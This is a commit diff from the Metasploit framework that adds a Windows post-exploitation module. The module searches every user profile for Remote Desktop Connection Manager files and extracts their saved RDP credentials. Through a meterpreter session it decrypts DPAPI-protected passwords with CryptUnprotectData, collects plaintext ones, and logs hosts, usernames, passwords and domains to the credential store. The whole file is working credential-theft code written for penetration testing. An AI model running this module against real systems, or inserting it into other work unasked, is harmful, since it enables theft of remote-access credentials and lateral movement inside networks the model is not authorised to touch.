Land rapid7#3730, @TomSellers's post module for Remote Desktop Connection Manager

jvazquez-r7 · jvazquez-r7 · commit 83bf220a10d2 · 2014-09-12T15:38:33.000-05:00
diff --git a/modules/post/windows/gather/credentials/rdc_manager_creds.rb b/modules/post/windows/gather/credentials/rdc_manager_creds.rb
@@ -0,0 +1,218 @@
+# -*- coding: binary -*-
+
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'rexml/document'
+require 'msf/core/auxiliary/report'
+
+class Metasploit3 < Msf::Post
+
+  include Msf::Post::Windows::UserProfiles
+  include Msf::Post::Windows::Priv
+  include Msf::Auxiliary::Report
+  include Msf::Post::File
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'          => 'Windows Gather Remote Desktop Connection Manager Saved Password Extraction',
+        'Description'   => %q{
+          This module extracts and decrypts saved Microsoft Remote Desktop
+          Connection Manager (RDCMan) passwords the .RDG files of users.
+          The module will attempt to find the files configured for all users
+          on the target system. Passwords for managed hosts are encrypted by
+          default.  In order for decryption of these passwords to be successful,
+          this module must be executed under the same account as the user which
+          originally encrypted the password.  Passwords stored in plain text will
+          be captured and documented.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'Tom Sellers <tom[at]fadedcode.net>'],
+        'Platform'      => [ 'win' ],
+        'SessionTypes'  => [ 'meterpreter' ]
+      ))
+  end
+
+  def run
+    if is_system?
+      uid = session.sys.config.getuid
+      print_warning("This module is running under #{uid}.")
+      print_warning("Automatic decryption of encrypted passwords will not be possible.")
+      print_warning("Migrate to a user process to achieve successful decryption (e.g. explorer.exe).")
+    end
+
+    settings_file = 'Microsoft Corporation\\Remote Desktop Connection Manager\RDCMan.settings'
+    profiles = grab_user_profiles
+
+    profiles.each do |user|
+      next if user['LocalAppData'].nil?
+      settings_path = "#{user['LocalAppData']}\\#{settings_file}"
+      next unless file?(settings_path)
+      print_status("Found settings for #{user['UserName']}.")
+
+      settings = read_file(settings_path)
+      connection_files = settings.scan(/string&gt;(.*?)&lt;\/string/)
+
+      connection_files.each do |con_f|
+        next unless session.fs.file.exists?(con_f[0])
+        print_status("\tOpening RDC Manager server list: #{con_f[0]}")
+        connection_data = read_file(con_f[0])
+        if connection_data
+          parse_connections(connection_data)
+        else
+          print_error("\tUnable to open RDC Manager server list: #{con_f[0]}")
+          next
+        end
+      end
+    end
+  end
+
+  def decrypt_password(data)
+    rg = session.railgun
+    rg.add_dll('crypt32') unless rg.get_dll('crypt32')
+
+    pid = client.sys.process.getpid
+    process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
+
+    mem = process.memory.allocate(128)
+    process.memory.write(mem, data)
+
+    if session.sys.process.each_process.find { |i| i["pid"] == pid && i["arch"] == "x86"}
+      addr = [mem].pack("V")
+      len = [data.length].pack("V")
+      ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)
+      len, addr = ret["pDataOut"].unpack("V2")
+    else
+      addr = [mem].pack("Q")
+      len = [data.length].pack("Q")
+      ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16)
+      len, addr = ret["pDataOut"].unpack("Q2")
+    end
+
+    return "" if len == 0
+    decrypted_pw = process.memory.read(addr, len)
+    return decrypted_pw
+  end
+
+  def extract_password(object)
+    if object.name == 'server'
+      logon_creds = object.elements['logonCredentials']
+    elsif object.elements['properties'] && object.elements['properties'].elements['logonCredentials']
+      logon_creds = object.elements['properties'].elements['logonCredentials']
+    else
+      return nil, nil, nil
+    end
+
+    if logon_creds.attributes['inherit'] == "None"
+      # The credentials are defined directly on the server
+      username = logon_creds.elements['userName'].text
+      domain = logon_creds.elements['domain'].text
+      if logon_creds.elements['password'].attributes['storeAsClearText'] == "True"
+        password = logon_creds.elements['password'].text
+      else
+        crypted_pass = Rex::Text.decode_base64(logon_creds.elements['password'].text)
+        password = decrypt_password(crypted_pass)
+        password = Rex::Text.to_ascii(password)
+        if password.blank?
+          print_warning("\tUnable to decrypt password, try migrating to a process running as the file's owner.")
+        end
+      end
+
+    elsif logon_creds.attributes['inherit'] == "FromParent"
+      # The credentials are inherited from a parent
+      parent = object.parent
+      username, password, domain = extract_password(parent)
+    end
+
+    return username, password, domain
+  end
+
+  def parse_connections(connection_data)
+    doc = REXML::Document.new(connection_data)
+
+    # Process all of the server records
+    doc.elements.each("//server") do |server|
+      svr_name = server.elements['name'].text
+      username, password, domain = extract_password(server)
+      if server.elements['connectionSettings'].attributes['inherit'] == "None"
+        port = server.elements['connectionSettings'].elements['port'].text
+      else
+        port = 3389
+      end
+
+      print_status("\t\t#{svr_name} \t#{username} #{password} #{domain}")
+      register_creds(svr_name, username, password, domain, port) if password || username
+    end
+
+    # Process all of the gateway elements, irrespective of server
+    doc.elements.each("//gatewaySettings") do |gateway|
+      next unless gateway.attributes['inherit'] == "None"
+      svr_name = gateway.elements['hostName'].text
+      username = gateway.elements['userName'].text
+      domain = gateway.elements['domain'].text
+
+      if gateway.elements['password'].attributes['storeAsClearText'] == "True"
+        password = gateway.elements['password'].text
+      else
+        crypted_pass = Rex::Text.decode_base64(gateway.elements['password'].text)
+        password = decrypt_password(crypted_pass)
+        password = Rex::Text.to_ascii(password)
+      end
+
+      parent = gateway.parent
+      if parent.elements['connectionSettings'].attributes['inherit'] == "None"
+        port = parent.elements['connectionSettings'].elements['port'].text
+      else
+        port = 3389
+      end
+
+      print_status("\t\t#{svr_name} \t#{username} #{password} #{domain}")
+      register_creds(svr_name, username, password, domain, port) if password || username
+    end
+  end
+
+  def register_creds(host_ip, user, pass, realm, port)
+    # Note that entries added by hostname instead of IP will not
+    # generate complete records.  See discussion here:
+    # https://github.com/rapid7/metasploit-framework/pull/3599#issuecomment-51710319
+
+    # Build service information
+    service_data = {
+      address: host_ip,
+      port: port,
+      service_name: 'rdp',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    # Build credential information
+    credential_data = {
+      origin_type: :session,
+      session_id: session_db_id,
+      post_reference_name: self.refname,
+      private_data: pass,
+      private_type: :password,
+      username: user,
+      realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+      realm_value: realm,
+      workspace_id: myworkspace_id
+    }
+
+    credential_data.merge!(service_data)
+    credential_core = create_credential(credential_data)
+
+    # Assemble the options hash for creating the Metasploit::Credential::Login object
+    login_data = {
+      core: credential_core,
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      workspace_id: myworkspace_id
+    }
+
+    login_data.merge!(service_data)
+    create_credential_login(login_data)
+  end
+end
